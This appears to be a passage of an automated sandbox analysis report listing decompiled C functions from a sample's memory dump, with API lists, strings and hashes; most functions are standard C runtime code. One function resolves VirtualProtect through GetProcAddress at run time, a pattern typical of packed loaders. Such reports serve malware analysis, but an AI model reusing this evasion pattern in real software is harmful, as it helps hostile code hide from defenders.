                  • Instruction ID: 6836d25a859e7f1f1db9386e19dac6458660400166952867fbc9272b813fb7a3
                  • Opcode Fuzzy Hash: dba47893a7da555e3c11fbd17a0312a2a1dec5ab0de22282eae602774f7d84e4
                  • Instruction Fuzzy Hash: 8B011E72910218ABCB01EBD1C846FDEBB78EF14355F10447BB204BA1D6DBB99A04C6AC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 55%
                  			E00417B75(intOrPtr* _a4) {
                  				signed int _v8;
                  				char _v12;
                  				char _v20;
                  				intOrPtr* _t11;
                  				intOrPtr _t12;
                  				void* _t15;
                  				intOrPtr* _t21;
                  				void* _t22;
                  
                  				_t11 =  *0x451258; // 0x0
                  				_t12 =  *_t11;
                  				if(_t12 == 0) {
                  					_push(0x29);
                  					_push(_a4);
                  					_t15 = E00417385(E00417184( &_v12, " throw("),  &_v20, 1);
                  					goto L5;
                  				} else {
                  					if(_t12 != 0x5a) {
                  						_push(0x29);
                  						_push(_a4);
                  						_t15 = E00417807(_t22,  &_v20, " throw(", E00417A99(_t22,  &_v12));
                  						L5:
                  						E0041782B(_t15);
                  						return _a4;
                  					} else {
                  						 *0x451258 =  *0x451258 + 1;
                  						_t21 = _a4;
                  						 *_t21 = 0;
                  						 *(_t21 + 4) = _v8 & 0xffff0000;
                  						return _t21;
                  					}
                  				}
                  			}












                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Name::operator+$ArgumentDecorator::getNameName::Typesoperator+
                  • String ID: throw(
                  • API String ID: 4203687869-3159766648
                  • Opcode ID: 9b5626d3e7328c96dcbf69e7de1b231dae1bb6e3b2dcfec5759ffeb2b496ba49
                  • Instruction ID: aac9c60b271866fa9502b5ac30de225d0b6a12b4ee3a9721f3bcfdb5ae0d46ff
                  • Opcode Fuzzy Hash: 9b5626d3e7328c96dcbf69e7de1b231dae1bb6e3b2dcfec5759ffeb2b496ba49
                  • Instruction Fuzzy Hash: 1F018870648209ABCF10EF64DC46EED3BB5EB44308F04815AF905AB392D678D5858788
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0044C2A0(void* __ecx) {
                  				intOrPtr _v8;
                  				_Unknown_base(*)()* _t6;
                  
                  				_v8 = 0x20;
                  				_v8 = _v8 + 0x20;
                  				lstrcatW(0x46f998, L"kernel32.dll");
                  				_t6 = GetProcAddress(GetModuleHandleW(0x46f998), "VirtualProtect");
                  				 *0x46f380 = _t6;
                  				return _t6;
                  			}






                  APIs
                  • lstrcatW.KERNEL32(0046F998,kernel32.dll), ref: 0044C2B9
                  • GetModuleHandleW.KERNEL32(0046F998), ref: 0044C2C4
                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0044C2D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressHandleModuleProclstrcat
                  • String ID: $VirtualProtect$kernel32.dll
                  • API String ID: 1163435009-2616575124
                  • Opcode ID: 57ed4c1c6597f00e76e712b5bbf96bb213c659950951f2d61c6c920ea36d044e
                  • Instruction ID: 065932f7eefff8f14ef4c5232986abd9eb4df1f7df6974ebca2aa73f3e70aa32
                  • Opcode Fuzzy Hash: 57ed4c1c6597f00e76e712b5bbf96bb213c659950951f2d61c6c920ea36d044e
                  • Instruction Fuzzy Hash: ACD0C2F4944304BBC7009BD4BC0DB4E3B78EB08710B50017AF60EB2191E7B80588C79E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0040EFEF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t24;
                  				void* _t35;
                  				intOrPtr* _t37;
                  				void* _t38;
                  				void* _t39;
                  
                  				_t39 = __eflags;
                  				_t27 = __ebx;
                  				_push(0xc);
                  				_push(0x47e410);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t35 = E0040694F(__ebx, __edx, __edi, _t39);
                  				_t37 = E00406D1F(8, 1);
                  				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                  				_t40 = _t37;
                  				if(_t37 != 0) {
                  					E0040EDEF(__ebx, __edx, _t35, _t37, __eflags);
                  					E0040E613(__ebx, __edx, _t35, _t37, __eflags);
                  					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                  					 *(_t37 + 4) =  *(_t35 + 0x68);
                  					E0040CFC1(_t27, 0xc);
                  					_t5 = _t38 - 4;
                  					 *_t5 =  *(_t38 - 4) & 0x00000000;
                  					__eflags =  *_t5;
                  					E0040EC63( *_t37);
                  					 *(_t38 - 4) = 0xfffffffe;
                  					E0040F089();
                  					E0040CFC1(_t27, 0xd);
                  					 *(_t38 - 4) = 1;
                  					InterlockedIncrement( *(_t37 + 4));
                  					 *(_t38 - 4) = 0xfffffffe;
                  					E0040F095();
                  					_t24 = _t37;
                  				} else {
                  					 *((intOrPtr*)(E00403B7E(_t40))) = 0xc;
                  					_t24 = 0;
                  				}
                  				return E00404209(_t24);
                  			}









                  APIs
                  • __getptd.LIBCMT ref: 0040EFFB
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __calloc_crt.LIBCMT ref: 0040F006
                    • Part of subcall function 00406D1F: __calloc_impl.LIBCMT ref: 00406D30
                    • Part of subcall function 00406D1F: Sleep.KERNEL32(00000000), ref: 00406D47
                  • __lock.LIBCMT ref: 0040F03C
                  • ___addlocaleref.LIBCMT ref: 0040F048
                  • __lock.LIBCMT ref: 0040F05C
                  • InterlockedIncrement.KERNEL32(?), ref: 0040F06C
                    • Part of subcall function 00403B7E: __getptd_noexit.LIBCMT ref: 00403B7E
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__getptd
                  • String ID:
                  • API String ID: 3538106438-0
                  • Opcode ID: bc5d6095969061b252cec48674e04f868670fb39a9369d8ca42a4d936d8f6beb
                  • Instruction ID: 37d7c8ca16e2fd726f6e3ec6351c10cea6f0844aba48303ea4d11cab51fbc4e0
                  • Opcode Fuzzy Hash: bc5d6095969061b252cec48674e04f868670fb39a9369d8ca42a4d936d8f6beb
                  • Instruction Fuzzy Hash: D801D271604302EAE7207FB6984270C76A0AF44728F20467EF4547B2C2CB7949408659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E0040B9DB(void* __edx, void* __esi, intOrPtr* _a4) {
                  				signed int _v8;
                  				intOrPtr _t11;
                  				intOrPtr* _t15;
                  				intOrPtr* _t19;
                  				void* _t23;
                  				void* _t25;
                  
                  				_t26 = __esi;
                  				_t24 = __edx;
                  				_t11 =  *((intOrPtr*)( *_a4));
                  				if(_t11 == 0xe0434f4d) {
                  					__eflags =  *((intOrPtr*)(E0040694F(_t23, __edx, _t25, __eflags) + 0x90));
                  					if(__eflags > 0) {
                  						_t15 = E0040694F(_t23, __edx, _t25, __eflags) + 0x90;
                  						 *_t15 =  *_t15 - 1;
                  						__eflags =  *_t15;
                  					}
                  					goto L5;
                  				} else {
                  					_t32 = _t11 - 0xe06d7363;
                  					if(_t11 != 0xe06d7363) {
                  						L5:
                  						__eflags = 0;
                  						return 0;
                  					} else {
                  						 *(E0040694F(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                  						_push(8);
                  						_push(0x47e280);
                  						E004041C4(_t23, _t25, __esi);
                  						_t19 =  *((intOrPtr*)(E0040694F(_t23, __edx, _t25, _t32) + 0x78));
                  						if(_t19 != 0) {
                  							_v8 = _v8 & 0x00000000;
                  							 *_t19();
                  							_v8 = 0xfffffffe;
                  						}
                  						return E00404209(E0041B841(_t23, _t24, _t25, _t26));
                  					}
                  				}
                  			}










                  APIs
                  • __getptd.LIBCMT ref: 0040B9F5
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __getptd.LIBCMT ref: 0040BA06
                  • __getptd.LIBCMT ref: 0040BA14
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: bc1911c971a99eaeedd451675846135a61277c1a884a6e35b2f10b0cbda335d0
                  • Instruction ID: f54a6c0e218ad633bc623d9580d7e36b0c0123ed9ac57b05d7437104ea75ef14
                  • Opcode Fuzzy Hash: bc1911c971a99eaeedd451675846135a61277c1a884a6e35b2f10b0cbda335d0
                  • Instruction Fuzzy Hash: A3E048716101088FD7209769C046F253794EB84318F1600B7E80DDB3A3D73CD850599E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0040EFE4(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
                  				signed int _v8;
                  				void* _t10;
                  				LONG* _t13;
                  				LONG* _t18;
                  				LONG* _t22;
                  				LONG** _t33;
                  
                  				_t31 = __edi;
                  				_t24 = __ebx;
                  				_push(8);
                  				_push(0x47e3e8);
                  				_t10 = E004041C4(__ebx, __edi, __esi);
                  				_t33 = _a4;
                  				if(_t33 != 0) {
                  					E0040CFC1(__ebx, 0xd);
                  					_v8 = _v8 & 0x00000000;
                  					_t13 = _t33[1];
                  					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
                  						_t22 = _t33[1];
                  						_t42 = _t22 - 0x44f740;
                  						if(_t22 != 0x44f740) {
                  							_push(_t22);
                  							E00403E62(_t24, __edi, _t33, _t42);
                  						}
                  					}
                  					_v8 = 0xfffffffe;
                  					E0040EFCF();
                  					if( *_t33 != 0) {
                  						E0040CFC1(_t24, 0xc);
                  						_v8 = 1;
                  						E0040ECF2( *_t33);
                  						_t18 =  *_t33;
                  						if(_t18 != 0 &&  *_t18 == 0) {
                  							_t46 = _t18 - 0x44fc70;
                  							if(_t18 != 0x44fc70) {
                  								E0040EB1A(_t18);
                  							}
                  						}
                  						_v8 = 0xfffffffe;
                  						E0040EFDB();
                  					}
                  					 *_t33 = 0xbaadf00d;
                  					_t33[1] = 0xbaadf00d;
                  					_push(_t33);
                  					_t10 = E00403E62(_t24, _t31, _t33, _t46);
                  				}
                  				return E00404209(_t10);
                  			}










                  APIs
                  • __lock.LIBCMT ref: 0040EF3B
                    • Part of subcall function 0040CFC1: __mtinitlocknum.LIBCMT ref: 0040CFD7
                    • Part of subcall function 0040CFC1: __amsg_exit.LIBCMT ref: 0040CFE3
                    • Part of subcall function 0040CFC1: EnterCriticalSection.KERNEL32(?,?,?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001), ref: 0040CFEB
                  • InterlockedDecrement.KERNEL32(00000000), ref: 0040EF4D
                    • Part of subcall function 00403E62: __lock.LIBCMT ref: 00403E80
                    • Part of subcall function 00403E62: ___sbh_find_block.LIBCMT ref: 00403E8B
                    • Part of subcall function 00403E62: ___sbh_free_block.LIBCMT ref: 00403E9A
                    • Part of subcall function 00403E62: HeapFree.KERNEL32(00000000,?,0047DF30,0000000C,0040CFA2,00000000,0047E2E0,0000000C,0040CFDC,?,?,?,00403F71,00000004,0047DF50,0000000C), ref: 00403ECA
                    • Part of subcall function 00403E62: GetLastError.KERNEL32(?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001,00000214), ref: 00403EDB
                  • __lock.LIBCMT ref: 0040EF7B
                  • ___removelocaleref.LIBCMT ref: 0040EF8A
                  • ___freetlocinfo.LIBCMT ref: 0040EFA3
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __lock$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                  • String ID:
                  • API String ID: 1907232653-0
                  • Opcode ID: 03843a51e4bdf912d2830c8544586861ec1613f5916427fbb33fd9c71cf89ac5
                  • Instruction ID: 61995d92de73ab86334fc820be786a87e9b8955fa1ea628dc90416959d5fa8ca
                  • Opcode Fuzzy Hash: 03843a51e4bdf912d2830c8544586861ec1613f5916427fbb33fd9c71cf89ac5
                  • Instruction Fuzzy Hash: 23119A71604302EAEB20AF7B984571A76A49F00B24F24893FF454BB2C2CB7CD8908659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040E613(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t15;
                  				LONG* _t21;
                  				long _t23;
                  				void* _t31;
                  				LONG* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t29 = __edx;
                  				_t25 = __ebx;
                  				_push(0xc);
                  				_push(0x47e388);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t31 = E0040694F(__ebx, __edx, __edi, _t35);
                  				_t15 =  *0x44fc64; // 0xfffffffe
                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                  					E0040CFC1(_t25, 0xd);
                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                  					_t33 =  *(_t31 + 0x68);
                  					 *(_t34 - 0x1c) = _t33;
                  					__eflags = _t33 -  *0x44fb68; // 0x942c10
                  					if(__eflags != 0) {
                  						__eflags = _t33;
                  						if(_t33 != 0) {
                  							_t23 = InterlockedDecrement(_t33);
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								__eflags = _t33 - 0x44f740;
                  								if(__eflags != 0) {
                  									_push(_t33);
                  									E00403E62(_t25, _t31, _t33, __eflags);
                  								}
                  							}
                  						}
                  						_t21 =  *0x44fb68; // 0x942c10
                  						 *(_t31 + 0x68) = _t21;
                  						_t33 =  *0x44fb68; // 0x942c10
                  						 *(_t34 - 0x1c) = _t33;
                  						InterlockedIncrement(_t33);
                  					}
                  					 *(_t34 - 4) = 0xfffffffe;
                  					E0040E6AE();
                  				} else {
                  					_t33 =  *(_t31 + 0x68);
                  				}
                  				if(_t33 == 0) {
                  					E00406EDE(_t29, _t31, 0x20);
                  				}
                  				return E00404209(_t33);
                  			}











                  APIs
                  • __getptd.LIBCMT ref: 0040E61F
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __amsg_exit.LIBCMT ref: 0040E63F
                  • __lock.LIBCMT ref: 0040E64F
                  • InterlockedDecrement.KERNEL32(?), ref: 0040E66C
                  • InterlockedIncrement.KERNEL32(00942C10), ref: 0040E697
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID:
                  • API String ID: 4271482742-0
                  • Opcode ID: 036905ae6c0bb854c13454ee9e2e917981422368a4d446a692362d68b9e9cb0f
                  • Instruction ID: 3f2868211e2530df07ee20063ef1916b543885775ff60ede7a56dd7a9921fae7
                  • Opcode Fuzzy Hash: 036905ae6c0bb854c13454ee9e2e917981422368a4d446a692362d68b9e9cb0f
                  • Instruction Fuzzy Hash: 2E010031D007119BDB20AB26E80974E7760AF15724F450A3BE810772C1CB3CA8A2CFDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 41%
                  			E00403E62(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t10;
                  				intOrPtr _t13;
                  				intOrPtr _t23;
                  				void* _t25;
                  
                  				_push(0xc);
                  				_push(0x47df30);
                  				_t8 = E004041C4(__ebx, __edi, __esi);
                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                  				if(_t23 == 0) {
                  					L9:
                  					return E00404209(_t8);
                  				}
                  				if( *0x477ae0 != 3) {
                  					_push(_t23);
                  					L7:
                  					_t8 = HeapFree( *0x451064, 0, ??);
                  					_t31 = _t8;
                  					if(_t8 == 0) {
                  						_t10 = E00403B7E(_t31);
                  						 *_t10 = E00403B3C(GetLastError());
                  					}
                  					goto L9;
                  				}
                  				E0040CFC1(__ebx, 4);
                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                  				_t13 = E0040D0EF(_t23);
                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                  				if(_t13 != 0) {
                  					_push(_t23);
                  					_push(_t13);
                  					E0040D11F();
                  				}
                  				 *(_t25 - 4) = 0xfffffffe;
                  				_t8 = E00403EB8();
                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                  					goto L9;
                  				} else {
                  					_push( *((intOrPtr*)(_t25 + 8)));
                  					goto L7;
                  				}
                  			}








                  APIs
                  • __lock.LIBCMT ref: 00403E80
                    • Part of subcall function 0040CFC1: __mtinitlocknum.LIBCMT ref: 0040CFD7
                    • Part of subcall function 0040CFC1: __amsg_exit.LIBCMT ref: 0040CFE3
                    • Part of subcall function 0040CFC1: EnterCriticalSection.KERNEL32(?,?,?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001), ref: 0040CFEB
                  • ___sbh_find_block.LIBCMT ref: 00403E8B
                  • ___sbh_free_block.LIBCMT ref: 00403E9A
                  • HeapFree.KERNEL32(00000000,?,0047DF30,0000000C,0040CFA2,00000000,0047E2E0,0000000C,0040CFDC,?,?,?,00403F71,00000004,0047DF50,0000000C), ref: 00403ECA
                  • GetLastError.KERNEL32(?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001,00000214), ref: 00403EDB
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 7ea762eda1ebf044c4f8c405e59c29fa4e3d9de34db5be565e958af849e5b4de
                  • Instruction ID: 06b77f85b5cd2d30928d852232947d2651d9a29eb6c4ca12233567086fa98640
                  • Opcode Fuzzy Hash: 7ea762eda1ebf044c4f8c405e59c29fa4e3d9de34db5be565e958af849e5b4de
                  • Instruction Fuzzy Hash: 45012C71914311AADF20AFA2DC06B5F3E689F0076AF10463FF105B61D2CB7C9A818A9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041067F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				signed int _v12;
                  				char _v20;
                  				char _t43;
                  				char _t46;
                  				signed int _t53;
                  				signed int _t54;
                  				intOrPtr _t56;
                  				int _t57;
                  				int _t58;
                  				signed short* _t59;
                  				short* _t60;
                  				int _t65;
                  				char* _t73;
                  
                  				_t73 = _a8;
                  				if(_t73 == 0 || _a12 == 0) {
                  					L5:
                  					return 0;
                  				} else {
                  					if( *_t73 != 0) {
                  						E004043DC( &_v20, __edi, _a16);
                  						_t43 = _v20;
                  						__eflags =  *(_t43 + 0x14);
                  						if( *(_t43 + 0x14) != 0) {
                  							_t46 = E004107B0( *_t73 & 0x000000ff,  &_v20);
                  							__eflags = _t46;
                  							if(_t46 == 0) {
                  								__eflags = _a4;
                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                  								if(__eflags != 0) {
                  									L10:
                  									__eflags = _v8;
                  									if(_v8 != 0) {
                  										_t53 = _v12;
                  										_t11 = _t53 + 0x70;
                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                  										__eflags =  *_t11;
                  									}
                  									return 1;
                  								}
                  								L21:
                  								_t54 = E00403B7E(__eflags);
                  								 *_t54 = 0x2a;
                  								__eflags = _v8;
                  								if(_v8 != 0) {
                  									_t54 = _v12;
                  									_t33 = _t54 + 0x70;
                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                  									__eflags =  *_t33;
                  								}
                  								return _t54 | 0xffffffff;
                  							}
                  							_t56 = _v20;
                  							_t65 =  *(_t56 + 0xac);
                  							__eflags = _t65 - 1;
                  							if(_t65 <= 1) {
                  								L17:
                  								__eflags = _a12 -  *(_t56 + 0xac);
                  								if(__eflags < 0) {
                  									goto L21;
                  								}
                  								__eflags = _t73[1];
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								L19:
                  								_t57 =  *(_t56 + 0xac);
                  								__eflags = _v8;
                  								if(_v8 == 0) {
                  									return _t57;
                  								}
                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                  								return _t57;
                  							}
                  							__eflags = _a12 - _t65;
                  							if(_a12 < _t65) {
                  								goto L17;
                  							}
                  							__eflags = _a4;
                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                  							__eflags = _t58;
                  							_t56 = _v20;
                  							if(_t58 != 0) {
                  								goto L19;
                  							}
                  							goto L17;
                  						}
                  						_t59 = _a4;
                  						__eflags = _t59;
                  						if(_t59 != 0) {
                  							 *_t59 =  *_t73 & 0x000000ff;
                  						}
                  						goto L10;
                  					} else {
                  						_t60 = _a4;
                  						if(_t60 != 0) {
                  							 *_t60 = 0;
                  						}
                  						goto L5;
                  					}
                  				}
                  			}


















                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004106B3
                  • __isleadbyte_l.LIBCMT ref: 004106E7
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004027F0,?,00000000,00000000,?,?,?,?,004027F0), ref: 00410718
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004027F0,00000001,00000000,00000000,?,?,?,?,004027F0), ref: 00410786
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 60becb60b63d865f785cf5946297ae9db3ac0c3028fa36e955b8d80b4f64d528
                  • Instruction ID: 4f983da7cac33738cb305310807754d87b0ebe7c7c516589cd6ac99ed7485cd3
                  • Opcode Fuzzy Hash: 60becb60b63d865f785cf5946297ae9db3ac0c3028fa36e955b8d80b4f64d528
                  • Instruction Fuzzy Hash: A831B131600245EFDB21EF64C8849EA3BB5FF41310F14856AE4A59B2D1E7B4DDE0DB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00403D1E(void* __ebx, void* __edx, void* __edi, long _a4) {
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t3;
                  				void* _t4;
                  				long _t5;
                  				void* _t9;
                  				long _t16;
                  				long _t18;
                  
                  				_t14 = __edi;
                  				_t9 = __ebx;
                  				if( *0x451064 == 0) {
                  					E0040AF7C(__edi);
                  					E0040ADAB(__edx, 0x1e);
                  					E00406F32(0xff);
                  				}
                  				_t3 =  *0x477ae0;
                  				if(_t3 != 1) {
                  					_t16 = _a4;
                  					__eflags = _t3 - 3;
                  					if(__eflags != 0) {
                  						L8:
                  						__eflags = _t16;
                  						if(_t16 == 0) {
                  							_t16 = _t16 + 1;
                  							__eflags = _t16;
                  						}
                  						_t18 = _t16 + 0x0000000f & 0xfffffff0;
                  						__eflags = _t18;
                  						_t4 = HeapAlloc( *0x451064, 0, _t18);
                  					} else {
                  						_push(_t16);
                  						_t4 = E00403CCF(_t9, _t14, _t16, __eflags);
                  						__eflags = _t4;
                  						if(_t4 == 0) {
                  							goto L8;
                  						}
                  					}
                  					return _t4;
                  				} else {
                  					_t5 = _a4;
                  					if(_t5 == 0) {
                  						_t5 = _t5 + 1;
                  					}
                  					return HeapAlloc( *0x451064, 0, _t5);
                  				}
                  			}












                  APIs
                  • __FF_MSGBANNER.LIBCMT ref: 00403D2C
                    • Part of subcall function 0040AF7C: __set_error_mode.LIBCMT ref: 0040AF7E
                    • Part of subcall function 0040AF7C: __set_error_mode.LIBCMT ref: 0040AF8B
                    • Part of subcall function 0040AF7C: __NMSG_WRITE.LIBCMT ref: 0040AFA3
                    • Part of subcall function 0040AF7C: __NMSG_WRITE.LIBCMT ref: 0040AFAD
                  • __NMSG_WRITE.LIBCMT ref: 00403D33
                    • Part of subcall function 0040ADAB: __set_error_mode.LIBCMT ref: 0040ADDC
                    • Part of subcall function 0040ADAB: __set_error_mode.LIBCMT ref: 0040ADED
                    • Part of subcall function 0040ADAB: _strcpy_s.LIBCMT ref: 0040AE21
                    • Part of subcall function 0040ADAB: __invoke_watson.LIBCMT ref: 0040AE32
                    • Part of subcall function 0040ADAB: GetModuleFileNameA.KERNEL32(00000000,00450B59,00000104), ref: 0040AE4E
                    • Part of subcall function 0040ADAB: _strcpy_s.LIBCMT ref: 0040AE63
                    • Part of subcall function 0040ADAB: __invoke_watson.LIBCMT ref: 0040AE76
                    • Part of subcall function 0040ADAB: _strlen.LIBCMT ref: 0040AE7F
                    • Part of subcall function 0040ADAB: _strlen.LIBCMT ref: 0040AE8C
                    • Part of subcall function 0040ADAB: __invoke_watson.LIBCMT ref: 0040AEB9
                    • Part of subcall function 00406F32: ___crtCorExitProcess.LIBCMT ref: 00406F3A
                    • Part of subcall function 00406F32: ExitProcess.KERNEL32 ref: 00406F43
                  • HeapAlloc.KERNEL32(00000000,?), ref: 00403D5F
                  • HeapAlloc.KERNEL32(00000000,?), ref: 00403D8F
                    • Part of subcall function 00403CCF: __lock.LIBCMT ref: 00403CEC
                    • Part of subcall function 00403CCF: ___sbh_alloc_block.LIBCMT ref: 00403CF7
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __set_error_mode$__invoke_watson$AllocExitHeapProcess_strcpy_s_strlen$FileModuleName___crt___sbh_alloc_block__lock
                  • String ID:
                  • API String ID: 913549098-0
                  • Opcode ID: 482a7ec7c1538f4dcfcac1c3ce06f56321dca5e2e73b5d8e38b13513c69ed0e2
